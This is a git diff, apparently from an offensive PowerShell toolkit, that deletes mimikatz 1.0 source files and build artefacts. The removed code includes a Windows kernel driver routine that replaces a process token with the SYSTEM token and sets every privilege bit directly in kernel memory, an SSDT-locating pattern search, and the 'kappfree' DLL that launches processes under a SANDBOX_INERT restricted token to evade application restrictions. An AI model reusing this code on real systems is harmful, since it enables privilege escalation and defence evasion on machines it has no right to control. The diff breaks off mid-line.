RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\nToken chang :)\n"); - } - - if(INDEX_OS >= INDEX_VISTA) - { - *pFlags2 |= TOKEN_FROZEN_MASK; - } - - ZwClose(newSysTokenHandle); - } - ZwClose(sysProcessTokenHandle); - } - ZwClose(processHandle); - ZwClose(sysProcessHandle); - } - } - } - else - { - if(monTokenAcess = PsReferencePrimaryToken(monProcess)) - { - mesPrivileges = (PKIWI_NT6_PRIVILEGES) (((ULONG_PTR) monTokenAcess) + EPROCESS_OffSetTable[INDEX_OS][INDEX_TOKEN_PRIVS]); - - mesPrivileges->Present[0] = mesPrivileges->Enabled[0] /*= mesPrivileges->EnabledByDefault[0]*/ = 0xfc; - mesPrivileges->Present[1] = mesPrivileges->Enabled[1] /*= mesPrivileges->EnabledByDefault[1]*/ = //...0xff; - mesPrivileges->Present[2] = mesPrivileges->Enabled[2] /*= mesPrivileges->EnabledByDefault[2]*/ = //...0xff; - mesPrivileges->Present[3] = mesPrivileges->Enabled[3] /*= mesPrivileges->EnabledByDefault[3]*/ = 0xff; - mesPrivileges->Present[4] = mesPrivileges->Enabled[4] /*= mesPrivileges->EnabledByDefault[4]*/ = 0x0f; - - PsDereferencePrimaryToken(monTokenAcess); - } - } - } - } - else - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"%u\t%S\n", processId, processName); - } - } - return status; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/driver/processes.h b/Exfiltration/mimikatz-1.0/driver/processes.h deleted file mode 100644 index ae99825..0000000 --- a/Exfiltration/mimikatz-1.0/driver/processes.h +++ /dev/null @@ -1,33 +0,0 @@ -#pragma once -#include <ntifs.h> -#include "k_types.h" - -#define INDEX_EPROCESS_NEXT 0 -#define INDEX_EPROCESS_FLAGS2 1 -#define INDEX_TOKEN_PRIVS 2 -#define MAX_EPROCESS_LEN 3 - -#define TOKEN_FROZEN_MASK 0x00008000 - -typedef struct _KIWI_NT6_PRIVILEGES -{ - UCHAR Present[8]; - UCHAR Enabled[8]; - UCHAR EnabledByDefault[8]; -} KIWI_NT6_PRIVILEGES, *PKIWI_NT6_PRIVILEGES; - -typedef enum _KIWI_EPROCESS_ACTION -{ - ListProcesses, - ExchangeToken, - FullPrivilegeNT6 -} KIWI_EPROCESS_ACTION; - -extern char* PsGetProcessImageFileName(PEPROCESS monProcess); -extern NTSYSAPI NTSTATUS NTAPI ZwSetInformationProcess (__in HANDLE ProcessHandle, __in PROCESSINFOCLASS ProcessInformationClass, __in_bcount(ProcessInformationLength) PVOID ProcessInformation, __in ULONG ProcessInformationLength); - -NTSTATUS listProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); -NTSTATUS sysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); -NTSTATUS privProcesses(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); - -NTSTATUS listProcessesOrSysToken(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining, KIWI_EPROCESS_ACTION action);
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/driver/ssdt.c b/Exfiltration/mimikatz-1.0/driver/ssdt.c deleted file mode 100644 index 688dfb2..0000000 --- a/Exfiltration/mimikatz-1.0/driver/ssdt.c +++ /dev/null @@ -1,83 +0,0 @@ -#include "ssdt.h" - -#ifdef _M_X64 -PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable = NULL; -#endif - -NTSTATUS kSSDT(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining) -{ - NTSTATUS status; - USHORT idxFunction; - ULONG_PTR funcAddr; - - #ifdef _M_X64 - status = getKeServiceDescriptorTable(); - if(NT_SUCCESS(status)) - { - #endif - *ppszDestEnd = pszDest; *pcbRemaining= cbDest; - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION , L"kSSDT - KeServiceDescriptorTable\t: %p\nkSSDT - KeServiceDescriptorTable.TableSize\t: %u\n", KeServiceDescriptorTable, KeServiceDescriptorTable->TableSize); - for(idxFunction = 0; (idxFunction < KeServiceDescriptorTable->TableSize) && NT_SUCCESS(status) ; idxFunction++) - { - #ifdef _M_IX86 - funcAddr = (ULONG_PTR) KeServiceDescriptorTable->ServiceTable[idxFunction]; - #else - funcAddr = (ULONG_PTR) KeServiceDescriptorTable->OffsetToService; - if(INDEX_OS < INDEX_VISTA) - { - funcAddr += KeServiceDescriptorTable->OffsetToService[idxFunction] & ~EX_FAST_REF_MASK; - } - else - { - funcAddr += KeServiceDescriptorTable->OffsetToService[idxFunction] >> 4; - } - #endif - - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"[%4u]\t: ", idxFunction); - if(NT_SUCCESS(status)) - { - status = getModuleFromAddr(funcAddr, *ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining); - if(NT_SUCCESS(status) || status == STATUS_NOT_FOUND) - { - status = RtlStringCbPrintfExW(*ppszDestEnd, *pcbRemaining, ppszDestEnd, pcbRemaining, STRSAFE_NO_TRUNCATION, L"\n"); - } - } - } - #ifdef _M_X64 - } - #endif - return status; -} - -#ifdef _M_X64 -NTSTATUS getKeServiceDescriptorTable() -{ - NTSTATUS retour = STATUS_NOT_FOUND; - - UCHAR PTRN_WALL_Ke[] = {0x00, 0x00, 0x4d, 0x0f, 0x45, 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83}; - LONG OFFS_WNO8_Ke = -19; - LONG OFFS_WIN8_Ke = -16; - - PUCHAR refDebut = NULL, refFin = NULL; LONG offsetTo = 0; - UNICODE_STRING maRoutine; - PUCHAR baseSearch = NULL; - - if(KeServiceDescriptorTable) - { - retour = STATUS_SUCCESS; - } - else - { - RtlInitUnicodeString(&maRoutine, L"ZwUnloadKey"); - if(baseSearch = (PUCHAR) MmGetSystemRoutineAddress(&maRoutine)) - { - refDebut= baseSearch - 21*PAGE_SIZE; - refFin = baseSearch + 16*PAGE_SIZE; - offsetTo = (INDEX_OS < INDEX_8) ? OFFS_WNO8_Ke : OFFS_WIN8_Ke; - - retour = genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, refDebut, refFin, PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), offsetTo); - } - } - return retour; -} -#endif
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/driver/ssdt.h b/Exfiltration/mimikatz-1.0/driver/ssdt.h deleted file mode 100644 index 33ab9af..0000000 --- a/Exfiltration/mimikatz-1.0/driver/ssdt.h +++ /dev/null @@ -1,13 +0,0 @@ -#pragma once -#include "k_types.h" -#include "mod_memory.h" -#include "modules.h" - -NTSTATUS kSSDT(LPWSTR pszDest, size_t cbDest, LPWSTR *ppszDestEnd, size_t *pcbRemaining); - -#ifdef _M_IX86 - extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable; -#else - PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable; - NTSTATUS getKeServiceDescriptorTable(); -#endif diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog Binary files differdeleted file mode 100644 index 574462d..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog Binary files differdeleted file mode 100644 index 1393f52..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/CL.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog Binary files differdeleted file mode 100644 index 05c99d0..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/cl.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest deleted file mode 100644 index ecea6f7..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.dll.intermediate.manifest +++ /dev/null @@ -1,10 +0,0 @@ -<?xml version='1.0' encoding='UTF-8' standalone='yes'?> -<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> - <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> - <security> - <requestedPrivileges> - <requestedExecutionLevel level='asInvoker' uiAccess='false' /> - </requestedPrivileges> - </security> - </trustInfo> -</assembly> diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate deleted file mode 100644 index 4d28193..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -#v4.0:v100 -Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res Binary files differdeleted file mode 100644 index 416efb2..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.res +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog deleted file mode 100644 index 352791c..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/kappfree.write.1.tlog +++ /dev/null @@ -1,5 +0,0 @@ -^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\kappfree\kappfree.vcxproj -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kappfree.exp diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.read.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/link-cvtres.write.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog Binary files differdeleted file mode 100644 index cdc5689..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog Binary files differdeleted file mode 100644 index b97e650..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog Binary files differdeleted file mode 100644 index f8b3fd9..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/link.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog Binary files differdeleted file mode 100644 index be34103..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog Binary files differdeleted file mode 100644 index 23f6601..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog Binary files differdeleted file mode 100644 index 53b60f3..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/mt.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog Binary files differdeleted file mode 100644 index 92ee084..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog Binary files differdeleted file mode 100644 index 6f2e9b0..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog Binary files differdeleted file mode 100644 index c18037c..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/Win32/rc.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.c b/Exfiltration/mimikatz-1.0/kappfree/kappfree.c deleted file mode 100644 index 63130c9..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.c +++ /dev/null @@ -1,34 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "kappfree.h" - -extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow) -{ - HANDLE monToken, monSuperToken; - wchar_t * commandLine; - PROCESS_INFORMATION mesInfosProcess; - STARTUPINFO mesInfosDemarrer; - - if(OpenProcessToken(GetCurrentProcess(), TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY /*| TOKEN_IMPERSONATE*/, &monToken)) - { - if(CreateRestrictedToken(monToken, SANDBOX_INERT, 0, NULL, 0, NULL, 0, NULL, &monSuperToken)) - { - RtlZeroMemory(&mesInfosProcess, sizeof(PROCESS_INFORMATION)); - RtlZeroMemory(&mesInfosDemarrer, sizeof(STARTUPINFO)); - mesInfosDemarrer.cb = sizeof(STARTUPINFO); - - commandLine = _wcsdup(lpszCmdLine); - if(CreateProcessAsUser(monSuperToken, NULL, commandLine, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &mesInfosDemarrer, &mesInfosProcess)) - { - CloseHandle(mesInfosProcess.hThread); - CloseHandle(mesInfosProcess.hProcess); - } - free(commandLine); - CloseHandle(monSuperToken); - } - CloseHandle(monToken); - } -} diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.h b/Exfiltration/mimikatz-1.0/kappfree/kappfree.h deleted file mode 100644 index 22ffbc2..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.h +++ /dev/null @@ -1,9 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include <windows.h> - -extern __declspec(dllexport) void __cdecl startW(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow); diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc b/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc Binary files differdeleted file mode 100644 index f08bc56..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.rc +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj deleted file mode 100644 index ef29473..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj +++ /dev/null @@ -1,119 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup Label="ProjectConfigurations"> - <ProjectConfiguration Include="Release|Win32"> - <Configuration>Release</Configuration> - <Platform>Win32</Platform> - </ProjectConfiguration> - <ProjectConfiguration Include="Release|x64"> - <Configuration>Release</Configuration> - <Platform>x64</Platform> - </ProjectConfiguration> - </ItemGroup> - <PropertyGroup Label="Globals"> - <ProjectGuid>{E7A85049-E31E-4575-B6A0-E6F1EAA9EEB0}</ProjectGuid> - <Keyword>Win32Proj</Keyword> - <RootNamespace>kappfree</RootNamespace> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> - <ConfigurationType>DynamicLibrary</ConfigurationType> - <UseDebugLibraries>false</UseDebugLibraries> - <WholeProgramOptimization>true</WholeProgramOptimization> - <CharacterSet>Unicode</CharacterSet> - <UseOfMfc>Static</UseOfMfc> - </PropertyGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> - <ImportGroup Label="ExtensionSettings"> - </ImportGroup> - <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> - <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> - </ImportGroup> - <PropertyGroup Label="UserMacros" /> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <LinkIncremental>false</LinkIncremental> - <OutDir>$(SolutionDir)$(Platform)\</OutDir> - <IntDir>$(Platform)\</IntDir> - </PropertyGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader> - </PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <GenerateDebugInformation>false</GenerateDebugInformation> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - </Link> - </ItemDefinitionGroup> - <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> - <ClCompile> - <WarningLevel>Level3</WarningLevel> - <PrecompiledHeader> - </PrecompiledHeader> - <Optimization>Full</Optimization> - <FunctionLevelLinking>true</FunctionLevelLinking> - <IntrinsicFunctions>true</IntrinsicFunctions> - <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KAPPFREE_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> - <AdditionalIncludeDirectories>$(SolutionDir)/commun;$(SolutionDir)/modules</AdditionalIncludeDirectories> - <FavorSizeOrSpeed>Size</FavorSizeOrSpeed> - <StringPooling>true</StringPooling> - <ExceptionHandling>false</ExceptionHandling> - <FloatingPointModel>Fast</FloatingPointModel> - <FloatingPointExceptions>false</FloatingPointExceptions> - <CreateHotpatchableImage>false</CreateHotpatchableImage> - <ErrorReporting>None</ErrorReporting> - </ClCompile> - <Link> - <SubSystem>Windows</SubSystem> - <GenerateDebugInformation>false</GenerateDebugInformation> - <EnableCOMDATFolding>true</EnableCOMDATFolding> - <OptimizeReferences>true</OptimizeReferences> - <AdditionalDependencies>advapi32.lib;%(AdditionalDependencies)</AdditionalDependencies> - <LinkErrorReporting>NoErrorReport</LinkErrorReporting> - </Link> - </ItemDefinitionGroup> - <ItemGroup> - <ClCompile Include="kappfree.c" /> - </ItemGroup> - <ItemGroup> - <ClInclude Include="kappfree.h" /> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="kappfree.rc" /> - </ItemGroup> - <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> - <ImportGroup Label="ExtensionTargets"> - </ImportGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters b/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters deleted file mode 100644 index 987362e..0000000 --- a/Exfiltration/mimikatz-1.0/kappfree/kappfree.vcxproj.filters +++ /dev/null @@ -1,12 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup> - <ClInclude Include="kappfree.h" /> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="kappfree.rc" /> - </ItemGroup> - <ItemGroup> - <ClCompile Include="kappfree.c" /> - </ItemGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/CL.read.1.tlog Binary files differdeleted file mode 100644 index d6e37a7..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/CL.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/CL.write.1.tlog Binary files differdeleted file mode 100644 index 93f65cf..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/CL.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/cl.command.1.tlog Binary files differdeleted file mode 100644 index bd72d30..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/cl.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.dll.intermediate.manifest deleted file mode 100644 index ecea6f7..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.dll.intermediate.manifest +++ /dev/null @@ -1,10 +0,0 @@ -<?xml version='1.0' encoding='UTF-8' standalone='yes'?> -<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> - <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> - <security> - <requestedPrivileges> - <requestedExecutionLevel level='asInvoker' uiAccess='false' /> - </requestedPrivileges> - </security> - </trustInfo> -</assembly> diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.lastbuildstate b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.lastbuildstate deleted file mode 100644 index 4d28193..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -#v4.0:v100 -Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.res b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.res Binary files differdeleted file mode 100644 index f3f1c55..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.res +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.write.1.tlog deleted file mode 100644 index 17139b5..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/kelloworld.write.1.tlog +++ /dev/null @@ -1,5 +0,0 @@ -^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\librairies\kelloworld\kelloworld.vcxproj -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kelloworld.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kelloworld.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kelloworld.exp -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\kelloworld.exp diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link-cvtres.read.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link-cvtres.read.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link-cvtres.write.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link-cvtres.write.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.command.1.tlog Binary files differdeleted file mode 100644 index 41cc4a2..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.read.1.tlog Binary files differdeleted file mode 100644 index da4e714..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.write.1.tlog Binary files differdeleted file mode 100644 index 6d0be40..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/link.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.command.1.tlog Binary files differdeleted file mode 100644 index bbb2100..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.read.1.tlog Binary files differdeleted file mode 100644 index b7cc267..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.write.1.tlog Binary files differdeleted file mode 100644 index 1ff82f2..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/kelloworld/Win32/mt.write.1.tlog +++ /dev/null diff 